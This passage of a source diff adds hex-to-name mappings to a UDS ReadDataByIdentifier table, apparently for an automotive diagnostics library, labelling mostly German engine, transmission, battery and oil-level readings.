+UDS_RDBI.dataIdentifiers[0x5021] = "Getriebe Oeltemperatur" # or Geschwindigkeit der Hinterachse +UDS_RDBI.dataIdentifiers[0x5022] = "DCDC Kuelmitteltemperatur" # or Geschwindigkeit Vorderachse, Geschwindigkeit der Vorderachse +UDS_RDBI.dataIdentifiers[0x5023] = "Elektromaschine Inverter K hlwassertemperatur" +UDS_RDBI.dataIdentifiers[0x5024] = "Hochvolt Batterie Temperatur" +UDS_RDBI.dataIdentifiers[0x5025] = "Allrad Low Range aus AGK" # or OnBoard Lader Temperatur +UDS_RDBI.dataIdentifiers[0x5027] = "Klimaanforderung Vorne" +UDS_RDBI.dataIdentifiers[0x5028] = "Luefter Klimaanforderung" +UDS_RDBI.dataIdentifiers[0x5029] = "Luefter Kuehlanforderung" +UDS_RDBI.dataIdentifiers[0x5030] = "Aussenlufttemperatur tumg" +UDS_RDBI.dataIdentifiers[0x5031] = "Aussenlufttemperatur CAN (Kombi)" +UDS_RDBI.dataIdentifiers[0x5032] = "Extern modelierte Aussenlufttemperatur von CAN Kombi" +UDS_RDBI.dataIdentifiers[0x5033] = "Getriebefreigabe Automatgetriebe" +UDS_RDBI.dataIdentifiers[0x5034] = "Klemme 50 Startanforderung EZS" # or Klemme50 Startanforderung EZS +UDS_RDBI.dataIdentifiers[0x5035] = "PremAir Nachricht erkannt" +UDS_RDBI.dataIdentifiers[0x5040] = "Bremskreis Unterdruck" +UDS_RDBI.dataIdentifiers[0x5041] = "Bremskreis Unterdruckwert gueltig" +UDS_RDBI.dataIdentifiers[0x5042] = "Kickdownschalter" +UDS_RDBI.dataIdentifiers[0x504a] = "Clutch 1 Pressure learned characteristics" +UDS_RDBI.dataIdentifiers[0x504b] = "Clutch 2 Pressure learned characteristics" +UDS_RDBI.dataIdentifiers[0x504c] = "Clutch 3 Pressure learned characteristics" +UDS_RDBI.dataIdentifiers[0x504d] = "Clutch 4 Pressure learned characteristics" +UDS_RDBI.dataIdentifiers[0x505f] = "Transmission Oil Remaining Life" +UDS_RDBI.dataIdentifiers[0x5075] = "First Time Power Up Value" +UDS_RDBI.dataIdentifiers[0x50a0] = "MEC Manufacturers Enable" +UDS_RDBI.dataIdentifiers[0x50b2] = "HCP Status Register" # or TCM Status Registe" +UDS_RDBI.dataIdentifiers[0x50b4] = "Manufacturing Traceability Character" +UDS_RDBI.dataIdentifiers[0x50dd] = "Transmission Adaptives" +UDS_RDBI.dataIdentifiers[0x50de] = "Rate Based Monitoring" +UDS_RDBI.dataIdentifiers[0x5102] = "Kraftstoffmenge" +UDS_RDBI.dataIdentifiers[0x5103] = "Kraftstofffuellstand" +UDS_RDBI.dataIdentifiers[0x5105] = "Wert der aktuellen Hochspannung" +UDS_RDBI.dataIdentifiers[0x5116] = "Kilometerstand von CAN-Bus" +UDS_RDBI.dataIdentifiers[0x5200] = "AGR Niederdruck NT2 BMS Temperatur" +UDS_RDBI.dataIdentifiers[0x6000] = "Motordrehmoment" +UDS_RDBI.dataIdentifiers[0x6001] = "Adaption Kraftstoffdrucksensor" +UDS_RDBI.dataIdentifiers[0x6002] = "Motorzustand Schubabschaltung" +UDS_RDBI.dataIdentifiers[0x6003] = "Sychronisierungsverlust" # or SynchronizationLost, Leerlauferkennung, Systemlaufzeit, Motorzustand Leerlauferkennung +UDS_RDBI.dataIdentifiers[0x6004] = "Motorzustand Leerlaufregelung Aktiv" +UDS_RDBI.dataIdentifiers[0x6005] = "Motorzustand Vollasterkennung" +UDS_RDBI.dataIdentifiers[0x6006] = "Getriebeschutz" +UDS_RDBI.dataIdentifiers[0x6008] = "Nachstart aktiv" # or Motorzustand Nachstartanreicherung Abgeschaltet +UDS_RDBI.dataIdentifiers[0x600a] = "Motorzustand Start Aktiv" # or Start ist aktiv +UDS_RDBI.dataIdentifiers[0x6010] = "Energmanag HVBatterie Ladezustand" # or Gangsensor SG Adaption +UDS_RDBI.dataIdentifiers[0x6011] = "Energmanag HVBatterie Kapazitaet Stromintegral" # or Aussetzerzaehler HWZyl1, Gangsensor SG Adaption Fehler +UDS_RDBI.dataIdentifiers[0x6012] = "Kupplungspedalsensor Adaption" # or Energmanag HVBatterie Kapazitaet aktuell, Aussetzerzaehler HWZyl2 +UDS_RDBI.dataIdentifiers[0x6013] = "Aussetzerzaehler HWZyl3" # or Energmanag HVBatterie Strom, Kupplungspedalsensor Adaptionswert Pedal losgelassen +UDS_RDBI.dataIdentifiers[0x6014] = "HVBatterie Ladezustand nach Spg Tabelle" # or Energmanag HVBatterie Ladezustand nach Spg Tabelle, Kupplungspedalsensor Adaptionswert Pedal gedrueckt +UDS_RDBI.dataIdentifiers[0x6015] = "Kupplungspedalsensor Adaption Fehler" # or ESOC OCV Arr21 10mV 0 +UDS_RDBI.dataIdentifiers[0x6016] = "Kupplungspedalsensor Adaptionswert Pedal losgelassen gueltig" +UDS_RDBI.dataIdentifiers[0x6017] = "Energmanag HVBatterie Innenwiderstand Korr Laden" # or Kupplungspedalsensor Adaptionswert Pedal gedrueckt gueltig +UDS_RDBI.dataIdentifiers[0x6018] = "Gangsensor SG Nulllagenadaptionswert gueltig" # or Energmanag HVBatterie Innenwiderstand Korr Entladen +UDS_RDBI.dataIdentifiers[0x6019] = "HVBatterie" # or EDIAG Batt Volt StepDelta 0, Gangsensor SG Rueckwaertsgang Adaptionswert gueltig +UDS_RDBI.dataIdentifiers[0x601a] = "Gangsensor SG Gang6Adaptionswert gueltig" +UDS_RDBI.dataIdentifiers[0x601e] = "Luftansaugung Klappe links Fehler Referenzfahrt" +UDS_RDBI.dataIdentifiers[0x601f] = "Luftansaugung Klappe rechts Fehler Referenzfahrt" +UDS_RDBI.dataIdentifiers[0x6020] = "Abgasklappe Adaption laeuft" # or Energmanag HVSchuetze Zuendungszaehler Fahrzeugwerk, Kompressionspruefungsstatus +UDS_RDBI.dataIdentifiers[0x6021] = "Abgasklappe Adaption fertig" # or Energmanag HVSystem spannungsfrei +UDS_RDBI.dataIdentifiers[0x6022] = "Abgasklappe Adaption erfolgreich" +UDS_RDBI.dataIdentifiers[0x6023] = "Abgasklappe Adaption Abbruch" +UDS_RDBI.dataIdentifiers[0x6024] = "Abgasklappe Adaption Fehler" # or Kompressionszeit Zylinder 4 +UDS_RDBI.dataIdentifiers[0x6025] = "Kompressionszeit Zylinder 5" # or Abgasklappe Diagnosemodus +UDS_RDBI.dataIdentifiers[0x6026] = "Kompressionszeit Zylinder 6" # or Abgasklappe Hardware +UDS_RDBI.dataIdentifiers[0x6027] = "Abgasklappe Endstufenspannung" +UDS_RDBI.dataIdentifiers[0x6029] = "Abgasklappe Positionssensor Fehler" +UDS_RDBI.dataIdentifiers[0x6030] = "Laufruhe HWZyl1" # or Abgasklappe Regelfehler +UDS_RDBI.dataIdentifiers[0x6031] = "Laufruhe HWZyl2" +UDS_RDBI.dataIdentifiers[0x6032] = "Laufruhe HWZyl3" +UDS_RDBI.dataIdentifiers[0x6033] = "Abgasklappe Regelung" # or Laufruhe Zylinder 4 +UDS_RDBI.dataIdentifiers[0x6034] = "Abgasklappe Zaehler Freibrechereignisse" # or Laufruhe Zylinder 5 +UDS_RDBI.dataIdentifiers[0x6035] = "Abgasklappe Zustand Aktiv" # or Laufruhe Zylinder 6 +UDS_RDBI.dataIdentifiers[0x6036] = "Abgasklappe Zustand Fehler" +UDS_RDBI.dataIdentifiers[0x6037] = "Abgasklappe Zustand Standby" +UDS_RDBI.dataIdentifiers[0x6038] = "Abgasklappe Zustand Wartung" +UDS_RDBI.dataIdentifiers[0x603b] = "Abgasklappe Federrueckstellzeit" +UDS_RDBI.dataIdentifiers[0x6040] = "Produktionsmodus Fahrzyklen" # or Zuendwinkelspaetverstellung Mittelwert +UDS_RDBI.dataIdentifiers[0x6041] = "Zuendwinkelspaetverstellung HWZyl1" # or TD Counter +UDS_RDBI.dataIdentifiers[0x6042] = "Zuendwinkelspaetverstellung HWZyl2" # or TD km Stand erstes +UDS_RDBI.dataIdentifiers[0x6043] = "TD km Stand letztes" # or Zuendwinkelspaetverstellung HWZyl3 +UDS_RDBI.dataIdentifiers[0x6044] = "TD km Stand Reset" +UDS_RDBI.dataIdentifiers[0x6045] = "HVBatterie Energieinhalt Korrekturfaktor" +UDS_RDBI.dataIdentifiers[0x6049] = "HVBatterie Ladezustand berechnet" +UDS_RDBI.dataIdentifiers[0x6050] = "HVBatterie Ladezustand" +UDS_RDBI.dataIdentifiers[0x6051] = "HVBatterie Kapazitaet Stromintegral" +UDS_RDBI.dataIdentifiers[0x6052] = "HVBatterie Kapazitaet aktuell" +UDS_RDBI.dataIdentifiers[0x6053] = "HVBatterie Strom" +UDS_RDBI.dataIdentifiers[0x6055] = "HVBatterie OCV Kennlinie" +UDS_RDBI.dataIdentifiers[0x6056] = "HVBatterie Innenwiderstand Korr Laden" +UDS_RDBI.dataIdentifiers[0x6057] = "HVBatterie Innenwiderstand Korr Entladen" +UDS_RDBI.dataIdentifiers[0x6058] = "HVBatterie Test" +UDS_RDBI.dataIdentifiers[0x6059] = "HVBatterie Testerg Kapazitaet" +UDS_RDBI.dataIdentifiers[0x6060] = "HVBatterie Testerg Startspannung" # or BedingungFuelOnAdaptionGestoppt +UDS_RDBI.dataIdentifiers[0x6061] = "On Adaption Reset Durchfuehren" # or HVBatterie Testerg Spannungs Schrittweite, AnforderungFuelOnAdaptionResetDurchfuehren +UDS_RDBI.dataIdentifiers[0x6062] = "On Adaption Reset Durchgefuehrt" # or HVBatterie Testerg Kapazitaets Schrittweite +UDS_RDBI.dataIdentifiers[0x6063] = "FuelOnAdaptionFertigDominanterBereich" # or HVBatterie Testerg Widerstandsabgleich bei Ladung +UDS_RDBI.dataIdentifiers[0x6064] = "FuelOnAdaptionAngehalten" # or HVBatterie Testerg Widerstandsabgleich bei Entladung +UDS_RDBI.dataIdentifiers[0x6065] = "FuelOnAdaptionGestoppt" # or On Adaption Gestoppt, HVBatterie Testerg max Zellenspg bei R Messung +UDS_RDBI.dataIdentifiers[0x6066] = "FuelOnAdaptionReset" # or On Adaption Reset, HVBatterie Testerg max Zellenspg bei Kap Messung +UDS_RDBI.dataIdentifiers[0x6067] = "On Adaption Bedingung Gestoppt" # or HVBatterie Testerg Umgebungsinfo Widerstandsmessung, FuelOnAdaption +UDS_RDBI.dataIdentifiers[0x6068] = "FuelOnAdaptionAktuellerBereich" +UDS_RDBI.dataIdentifiers[0x6069] = "FuelOnAdaptionStatus" +UDS_RDBI.dataIdentifiers[0x606a] = "HVBatterie Energieinhalt Widerstandskorrekturfaktor" +UDS_RDBI.dataIdentifiers[0x606b] = "Geberradadaption angehalten wg. Aussetzer" # or Off On Adaption Angehalten Aussetzer, HVBatterie Energiezustand +UDS_RDBI.dataIdentifiers[0x606c] = "Energieverbrauch Lebenszeit" # or Off On Adaption Laufunruhe zu gross +UDS_RDBI.dataIdentifiers[0x606d] = "Energieverbrauch Kwh Stunde" +UDS_RDBI.dataIdentifiers[0x606e] = "klassifizierung Fehlerstromsumme" +UDS_RDBI.dataIdentifiers[0x606f] = "Off Adaption Freigabe DMDFOF3" # or HV Schuetze geschlossen +UDS_RDBI.dataIdentifiers[0x6070] = "On Adaption Fertig" # or FuelOnBedingungAdaptionAktuell ReadyFertig, DCDC Vorgabe Niederspannung +UDS_RDBI.dataIdentifiers[0x6071] = "Fuel-Off Adaption Fertig Bereich1" # or DCDC Vorgabe Hochspannung, Off Adaption Fertig Bereich1 +UDS_RDBI.dataIdentifiers[0x6072] = "Fuel-Off Adaption Freigabe" # or DCDC Vorgabe Strom auf Niederspannungsseite, Off Adaption Freigabe +UDS_RDBI.dataIdentifiers[0x6073] = "Off Adaption Laeuft" # or FuelOffAdaptionLaeuft, DCDC Vorgabe Strom auf Hochspannungsseite +UDS_RDBI.dataIdentifiers[0x6074] = "DCDC Vorgabestatus" +UDS_RDBI.dataIdentifiers[0x6075] = "DCDC Hochspannung" +UDS_RDBI.dataIdentifiers[0x6076] = "Ergebnis der Geberradadaption Segment" +UDS_RDBI.dataIdentifiers[0x6077] = "Ergebnis der Geberradadaption Segment" +UDS_RDBI.dataIdentifiers[0x6078] = "Reset Fuel On Adaption Durchgefuehrt Hybrid" +UDS_RDBI.dataIdentifiers[0x6079] = "On Adaption Status HYBRID" +UDS_RDBI.dataIdentifiers[0x607a] = "Fuel-Off Adaption Fertig Bereich1 Hybrid" +UDS_RDBI.dataIdentifiers[0x607b] = "FuelOffAdaptionLaeuft Hybrid" +UDS_RDBI.dataIdentifiers[0x607c] = "Filterwert Fuel Off Geberradadaption" +UDS_RDBI.dataIdentifiers[0x607d] = "Off Adaption Ergebniswert DMDFOF3" +UDS_RDBI.dataIdentifiers[0x607e] = "Off Adaption KatheizSegment aktiv" +UDS_RDBI.dataIdentifiers[0x607f] = "Off Adaption Fertig KatheizSegment" +UDS_RDBI.dataIdentifiers[0x6080] = "Gemischadaption Multiplikativ" # or Multiplikative Gemischadaption aktiv, Reiserechner Kraftstoffmenge erfolgreich geschrieben +UDS_RDBI.dataIdentifiers[0x6081] = "Gemischadaption Additiv" # or Additive Gemischadaption aktiv +UDS_RDBI.dataIdentifiers[0x6082] = "Gemischadaption" # or Kraftstoffverbrauch Lebenszeit, Gemischadaptionsphase aktiv +UDS_RDBI.dataIdentifiers[0x6083] = "Kraftstoffverbrauch Gesamtstrecke Lebenszeit" # or Gemischadaption Additiver Bereich +UDS_RDBI.dataIdentifiers[0x6084] = "Kraftstoffvolumen Lebenszeit Anzeige" +UDS_RDBI.dataIdentifiers[0x6085] = "Gemischadaption Additiv Integrator Stabil" +UDS_RDBI.dataIdentifiers[0x6086] = "Gemischadaption Additiv Integrator Stabil" +UDS_RDBI.dataIdentifiers[0x6087] = "Gemischadaption Additiv Lernwert" # or Additive Gemischkorrektur Bank 1 (Leerlauf) +UDS_RDBI.dataIdentifiers[0x6088] = "Additive Gemischkorrektur" +UDS_RDBI.dataIdentifiers[0x6089] = "Gemischadaption Additiv HFM" # or Additive Gemischkorrektur Bank 1 HFM +UDS_RDBI.dataIdentifiers[0x6090] = "Additive Gemischkorrektur Bank 2 HFM" +UDS_RDBI.dataIdentifiers[0x6091] = "Gemischadaption Additiv Drucksensor" # or Additive Gemischkorrektur Bank 1 (P-System) +UDS_RDBI.dataIdentifiers[0x6092] = "Additive Gemischkorrektur Bank 2 (P-System)" +UDS_RDBI.dataIdentifiers[0x6093] = "Grundadaption Bank 1 tra-Integrator" +UDS_RDBI.dataIdentifiers[0x6094] = "Grundadaption Bank 2 tra-Integrator" +UDS_RDBI.dataIdentifiers[0x6095] = "Integrator fra Bank 1 unten" # or Gemischadaption Integrator unten Lernwert +UDS_RDBI.dataIdentifiers[0x6096] = "Integrator fra Bank 2 unten" +UDS_RDBI.dataIdentifiers[0x6097] = "Integrator tra" +UDS_RDBI.dataIdentifiers[0x6098] = "Integrator tra" +UDS_RDBI.dataIdentifiers[0x6099] = "Grundadaption Bank 1 fra-Integrator" # or Gemischadaption Grundadaption Integrator +UDS_RDBI.dataIdentifiers[0x6100] = "Grundadaption Bank 2 fra-Integrator" +UDS_RDBI.dataIdentifiers[0x6101] = "Gemischadaption Multiplikativer Bereich" # or Berechneter Kraftstoffdruck +UDS_RDBI.dataIdentifiers[0x6102] = "Hebelgeber rechts Widerstand" +UDS_RDBI.dataIdentifiers[0x6103] = "Gemischadaptionswert Multiplikativ Rechts Unten" # or Multiplikative Gemischkorrektur Bank 1 unten (Teillast), Hebelgeber links Widerstand +UDS_RDBI.dataIdentifiers[0x6104] = "Multiplikative Gemischkorrektur Bank 2 unten" +UDS_RDBI.dataIdentifiers[0x6105] = "Gemischadaptionswert Multiplikativ" # or Multiplikativer Gemischadaptionsfaktor Bank 1 (Teillast) +UDS_RDBI.dataIdentifiers[0x6106] = "Volumenstrom berechnet" # or Multiplikativer Gemischadaptionsfaktor +UDS_RDBI.dataIdentifiers[0x6107] = "Gemischadaption Multiplikativ Gemischkorrektur" +UDS_RDBI.dataIdentifiers[0x6108] = "Multiplikative Gemischkorrektur" +UDS_RDBI.dataIdentifiers[0x6109] = "Typ 6letztes" +UDS_RDBI.dataIdentifiers[0x610a] = "Typ 5letztes" +UDS_RDBI.dataIdentifiers[0x610b] = "Typ 4letztes" +UDS_RDBI.dataIdentifiers[0x610c] = "Typ 3letztes" +UDS_RDBI.dataIdentifiers[0x610d] = "Typ vorletztes" +UDS_RDBI.dataIdentifiers[0x610e] = "Typ letztmaliges" +UDS_RDBI.dataIdentifiers[0x6110] = "erstmaliges" +UDS_RDBI.dataIdentifiers[0x6111] = "9letztes" # or Gemischadaption Kurztest Ergebnis +UDS_RDBI.dataIdentifiers[0x6112] = "8letztes" # or Gemischadaption Kurztest Ergebnis +UDS_RDBI.dataIdentifiers[0x6113] = "Gemischadaption Kurztest Errorflag" # or 7letztes +UDS_RDBI.dataIdentifiers[0x6114] = "Gemischadaption Kurztest Errorflag" # or 6letztes +UDS_RDBI.dataIdentifiers[0x6115] = "Gemischadaption Kurztest Zyklusflag" # or 5letztes +UDS_RDBI.dataIdentifiers[0x6116] = "4letztes" # or Gemischadaption Kurztest Zyklusflag +UDS_RDBI.dataIdentifiers[0x6117] = "Gemischadaption Kurztest Lambdareglerabweichung" +UDS_RDBI.dataIdentifiers[0x6118] = "Kurztest Signalfehler" +UDS_RDBI.dataIdentifiers[0x6119] = "letztes" # or Gemischadaption Kurztest Ergebnis Unplausibel +UDS_RDBI.dataIdentifiers[0x6120] = "Gemischadaption Kurztest Ergebnis Unplausibel" +UDS_RDBI.dataIdentifiers[0x6121] = "Gemischadaption Additiv Fertig" +UDS_RDBI.dataIdentifiers[0x6122] = "Gemischadaption Multiplikativ Unten Fertig" +UDS_RDBI.dataIdentifiers[0x6124] = "Geschwindigkeit erstmaliges" +UDS_RDBI.dataIdentifiers[0x6125] = "Geschwindigkeit 9letztes" +UDS_RDBI.dataIdentifiers[0x6126] = "Geschwindigkeit 8letztes" +UDS_RDBI.dataIdentifiers[0x6127] = "Gemischadaption Nach Reset Fertig" +UDS_RDBI.dataIdentifiers[0x6128] = "Geschwindigkeit 6letztes" +UDS_RDBI.dataIdentifiers[0x6129] = "Geschwindigkeit 5letztes" +UDS_RDBI.dataIdentifiers[0x612a] = "Geschwindigkeit 4letztes" +UDS_RDBI.dataIdentifiers[0x612b] = "Geschwindigkeit 3letztes" +UDS_RDBI.dataIdentifiers[0x612c] = "Geschwindigkeit vorletztes" +UDS_RDBI.dataIdentifiers[0x612d] = "Geschwindigkeit letztes" +UDS_RDBI.dataIdentifiers[0x6130] = "Drehzahl erstmaliges" # or Lambdaregelwert +UDS_RDBI.dataIdentifiers[0x6131] = "Lambdaregelwert" # or Drehzahl 9letztes +UDS_RDBI.dataIdentifiers[0x6132] = "Lambdaregelfaktor Mittelwert" +UDS_RDBI.dataIdentifiers[0x6133] = "Schneller Mittelwert Lambdaregelfaktors" +UDS_RDBI.dataIdentifiers[0x6134] = "Mittelwert vom Produkt Abweichung Lambdaregler-Lambda" # or Lambdaregler Abweichung Mittelwert +UDS_RDBI.dataIdentifiers[0x6135] = "Sondenbereitschaft Rechts Vor KAT" # or O2Regelsonde Bank 1 bereit +UDS_RDBI.dataIdentifiers[0x6136] = "O2Regelsonde Bank 2 bereit" +UDS_RDBI.dataIdentifiers[0x6137] = "O2Diagnosesonde Bank 1 bereit" # or Sondenbereitschaft Rechts Nach KAT +UDS_RDBI.dataIdentifiers[0x6138] = "O2Diagnosesonde Bank 2 bereit" +UDS_RDBI.dataIdentifiers[0x6139] = "Drehzahl letztes" +UDS_RDBI.dataIdentifiers[0x613a] = "Oeltemperatur erstmaliges" +UDS_RDBI.dataIdentifiers[0x613b] = "Oeltemperatur 9letztes" +UDS_RDBI.dataIdentifiers[0x613c] = "Oeltemperatur 8letztes" +UDS_RDBI.dataIdentifiers[0x613d] = "Oeltemperatur 7letztes" +UDS_RDBI.dataIdentifiers[0x613e] = "Oeltemperatur 6letztes" +UDS_RDBI.dataIdentifiers[0x613f] = "Oeltemperatur 5letztes" +UDS_RDBI.dataIdentifiers[0x6140] = "Oeltemperatur 4letztes" +UDS_RDBI.dataIdentifiers[0x6141] = "Oeltemperatur 3letztes" +UDS_RDBI.dataIdentifiers[0x6142] = "Oeltemperatur vorletztes" +UDS_RDBI.dataIdentifiers[0x6143] = "Lambda Sollwert" # or Oeltemperatur letztes +UDS_RDBI.dataIdentifiers[0x6144] = "Lambda Sollwert" # or rel Motorlast erstmaliges +UDS_RDBI.dataIdentifiers[0x6145] = "Sonde Anzahl Dynamikmessungen LSU" # or Anzahl der Dynamikmessungen LSU rechte +UDS_RDBI.dataIdentifiers[0x6146] = "Anzahl der Dynamikmessungen LSU linke" +UDS_RDBI.dataIdentifiers[0x6147] = "Lambdaregelung I Anteil hinter Kat rechte Bank (DE" +UDS_RDBI.dataIdentifiers[0x6148] = "Lambdaregelung I Anteil hinter Kat linke Bank (DE" +UDS_RDBI.dataIdentifiers[0x6149] = "Sonde Dynamikwert Der LSU" # or Dynamikwert der LSU rechte +UDS_RDBI.dataIdentifiers[0x614a] = "rel Motorlast 4letztes" +UDS_RDBI.dataIdentifiers[0x614b] = "rel Motorlast 3letztes" +UDS_RDBI.dataIdentifiers[0x614c] = "rel Motorlast vorletztes" +UDS_RDBI.dataIdentifiers[0x614d] = "rel Motorlast letztes" +UDS_RDBI.dataIdentifiers[0x614e] = "Zaehler Sensorfehler" +UDS_RDBI.dataIdentifiers[0x614f] = "Servicestatus aktuell" +UDS_RDBI.dataIdentifiers[0x6150] = "Dynamikwert der LSU linke" +UDS_RDBI.dataIdentifiers[0x6151] = "Kat Diagnose Sauerstoffspeichervermoegen gefiltert" +UDS_RDBI.dataIdentifiers[0x6152] = "Restlaufstrecke Anzeige" +UDS_RDBI.dataIdentifiers[0x6153] = "Startlaufstrecke" +UDS_RDBI.dataIdentifiers[0x6154] = "Restlaufstrecke Intern" +UDS_RDBI.dataIdentifiers[0x6155] = "Restlaufstrecke AdBlue" +UDS_RDBI.dataIdentifiers[0x6156] = "Restlaufstrecke Extern" +UDS_RDBI.dataIdentifiers[0x6157] = "Restlaufstrecke Kraftstoff" +UDS_RDBI.dataIdentifiers[0x6158] = "Restlaufstrecke Russ" +UDS_RDBI.dataIdentifiers[0x6159] = "Restlaufstrecke Viskositaet" +UDS_RDBI.dataIdentifiers[0x6160] = "Motorzustand Verbrennungsmotor laeuft" +UDS_RDBI.dataIdentifiers[0x6161] = "Leerlaufdrehzahlanhebung Abbruchgrund" # or Bitleiste zur Anzeige von Abbruchgruenden bei der Erhoehung der Leerlaufdrehzahl als Steller +UDS_RDBI.dataIdentifiers[0x6162] = "Gefahrene km Verbrennungsmotor" +UDS_RDBI.dataIdentifiers[0x6163] = "Gefahrene km E-Motor" +UDS_RDBI.dataIdentifiers[0x6164] = "Katalysatordiagnose freigegeben" +UDS_RDBI.dataIdentifiers[0x6165] = "Normiertes Sauerstoffspeichervermoegen des Katalysators, rechte" # or Kat Diagnose Sauerstoffspeichervermoegen normiert +UDS_RDBI.dataIdentifiers[0x6166] = "Normiertes Sauerstoffspeichervermoegen des Katalysators, linke" # or Oelstand +UDS_RDBI.dataIdentifiers[0x6167] = "Kat Diagnose Sauerstoffspeichervermoegen" # or Oelstand Prozent +UDS_RDBI.dataIdentifiers[0x6168] = "Oelstand VolumenGespeichert" +UDS_RDBI.dataIdentifiers[0x6169] = "Kat Diagnose Laeuft" # or Oelstand VolumenGespeichertGefiltert, Katalysatordiagnose laeuft +UDS_RDBI.dataIdentifiers[0x616a] = "Katalysatordiagnose laeuft Links" +UDS_RDBI.dataIdentifiers[0x6170] = "Oelstand KilometertstandLetzteSpeicherung" +UDS_RDBI.dataIdentifiers[0x6171] = "Oelstand StatusErkennung" # or Testerverstellzyklus Nockenwelle Auslass Bank 1 beendet +UDS_RDBI.dataIdentifiers[0x6172] = "Testerverstellzyklus Nockenwelle Auslass Bank 2 beendet" # or Oelstand Oelvolumen +UDS_RDBI.dataIdentifiers[0x6173] = "Testerverstellzyklus Nockenwelle Einlass Bank 1 beendet" # or Oelstand Oelverbrauch, Nockenwelle Einlass Testerverstellzyklus Rechts Beendet +UDS_RDBI.dataIdentifiers[0x6174] = "Oelstand ModellwertOelverduennung" # or Testerverstellzyklus Nockenwelle Einlass Bank 2 beendet +UDS_RDBI.dataIdentifiers[0x6175] = "Oelstand AnzahlSpeicherungen" # or Nockenwellenzustand Auslass +UDS_RDBI.dataIdentifiers[0x6176] = "Nockenwelle Einlass Zustand" # or Nockenwellenzustand Einlass +UDS_RDBI.dataIdentifiers[0x6177] = "Restlaufstrecke Motoroel" +UDS_RDBI.dataIdentifiers[0x6178] = "Restlaufstrecke Min Motoroel" +UDS_RDBI.dataIdentifiers[0x6179] = "Restlaufstrecke Max Motoroel" # or Nockenwelle Auslass Grob Feinadaption Beendet +UDS_RDBI.dataIdentifiers[0x6180] = "Tageszaehler erstmaliges" +UDS_RDBI.dataIdentifiers[0x6181] = "Tageszaehler 9letztes" +UDS_RDBI.dataIdentifiers[0x6182] = "Tageszaehler 8letztes" +UDS_RDBI.dataIdentifiers[0x6183] = "Tageszaehler 7letztes" # or Nockenwellenwinkel Sollwert Einlass +UDS_RDBI.dataIdentifiers[0x6184] = "Tageszaehler 6letztes" +UDS_RDBI.dataIdentifiers[0x6185] = "Tageszaehler 5letztes" +UDS_RDBI.dataIdentifiers[0x6186] = "Tageszaehler 4letztes" +UDS_RDBI.dataIdentifiers[0x6187] = "Tageszaehler 3letztes" +UDS_RDBI.dataIdentifiers[0x6188] = "Tageszaehler vorletztes" +UDS_RDBI.dataIdentifiers[0x6189] = "Tageszaehler letztes" +UDS_RDBI.dataIdentifiers[0x618a] = "Oelstand erstmaliges" +UDS_RDBI.dataIdentifiers[0x618b] = "Oelstand 9letztes" +UDS_RDBI.dataIdentifiers[0x618c] = "Oelstand 8letztes" +UDS_RDBI.dataIdentifiers[0x618d] = "Oelstand 7letztes" +UDS_RDBI.dataIdentifiers[0x618e] = "Oelstand 6letztes" +UDS_RDBI.dataIdentifiers[0x618f] = "Oelstand 5letztes" +UDS_RDBI.dataIdentifiers[0x6190] = "Oelstand 4letztes" +UDS_RDBI.dataIdentifiers[0x6191] = "Oelstand 3letztes" +UDS_RDBI.dataIdentifiers[0x6192] = "Oelstand vorletztes" +UDS_RDBI.dataIdentifiers[0x6193] = "Oelstand letztes" +UDS_RDBI.dataIdentifiers[0x6194] = "Verbrauch fl ssiger Kraftstoff seit RESET" +UDS_RDBI.dataIdentifiers[0x6195] = "Verbrauch fl ssiger Kraftstoff seit START" +UDS_RDBI.dataIdentifiers[0x6196] = "Verbrauch gasf rmiger Kraftstoff seit RESET" +UDS_RDBI.dataIdentifiers[0x6197] = "Verbrauch gasf rmiger Kraftstoff seit START" +UDS_RDBI.dataIdentifiers[0x6198] = "Verbrauch elektrischer Energie seit RESET" +UDS_RDBI.dataIdentifiers[0x6199] = "Verbrauch elektrischer Energie seit Start" +UDS_RDBI.dataIdentifiers[0x619a] = "Distance seit RESET Kraftstoff" +UDS_RDBI.dataIdentifiers[0x619b] = "Distance seit START Kraftstoff" +UDS_RDBI.dataIdentifiers[0x619c] = "Distance seit RESET el Energie" +UDS_RDBI.dataIdentifiers[0x619d] = "Distance seit START el Energie" +UDS_RDBI.dataIdentifiers[0x619e] = "Anzeige ECO Beschleunigung" +UDS_RDBI.dataIdentifiers[0x619f] = "Anzeige ECO Rollen" +UDS_RDBI.dataIdentifiers[0x61a0] = "Anzeige Bonus Reichweite" +UDS_RDBI.dataIdentifiers[0x61a1] = "Anzeige ECO Gesamt" +UDS_RDBI.dataIdentifiers[0x61a2] = "Anzeige ECO Konstanz" +UDS_RDBI.dataIdentifiers[0x61b0] = "Stoppverbot Verursacher Benzinmotor KatWarmUp" +UDS_RDBI.dataIdentifiers[0x61b1] = "Stoppverbot Verursacher Benzinmotor Katheizen" +UDS_RDBI.dataIdentifiers[0x61b2] = "Stoppverbot Verursacher Benzinmotor Diag KG Entlueftung" +UDS_RDBI.dataIdentifiers[0x61b3] = "Stoppverbot Verursacher Benzinmotor Tankentlueftung" +UDS_RDBI.dataIdentifiers[0x61b4] = "Stoppverbot Verursacher Benzinmotor Diag Tankentlueftung" +UDS_RDBI.dataIdentifiers[0x61b5] = "Stoppverbot Verursacher Benzinmotor Gemischadaption" +UDS_RDBI.dataIdentifiers[0x61b6] = "Stoppverbot Verursacher Benzinmotor Erststart" +UDS_RDBI.dataIdentifiers[0x61b7] = "Stoppverbot Verursacher Benzinmotor Diag Abgas" +UDS_RDBI.dataIdentifiers[0x61b8] = "Stoppverbot Verursacher Benzinmotor OPF" +UDS_RDBI.dataIdentifiers[0x61b9] = "Stoppverbot Verursacher Benzinmotor Umgebungsbedingungen" +UDS_RDBI.dataIdentifiers[0x61ba] = "Stoppverbot Verursacher Benzinmotor Geberradadaption" +UDS_RDBI.dataIdentifiers[0x61bb] = "Stoppverbot Verursacher Benzinmotor Thermomanagement" +UDS_RDBI.dataIdentifiers[0x61bc] = "Stoppverbot Verursacher Benzinmotor Zylindergleichstellung" +UDS_RDBI.dataIdentifiers[0x61bd] = "Stoppverbot Verursacher Benzinmotor Testeranforderung Bandende" +UDS_RDBI.dataIdentifiers[0x61c0] = "Start Stopp vorhStartanforderer Benzinmotor" +UDS_RDBI.dataIdentifiers[0x6200] = "Warnspeicherreset Read ASSYST Warnspeicher km Stand Warnspeicherreset" # or Start Stopp Vorbedingungen mech Getriebe +UDS_RDBI.dataIdentifiers[0x6201] = "Start Stopp Fehlerstatus" # or Zaehler Min Schalter Read ASSYST Warnspeicher Zaehler Min Schalter +UDS_RDBI.dataIdentifiers[0x6202] = "Zaehler Min" # or Stoppverbot Verursacher ASSP 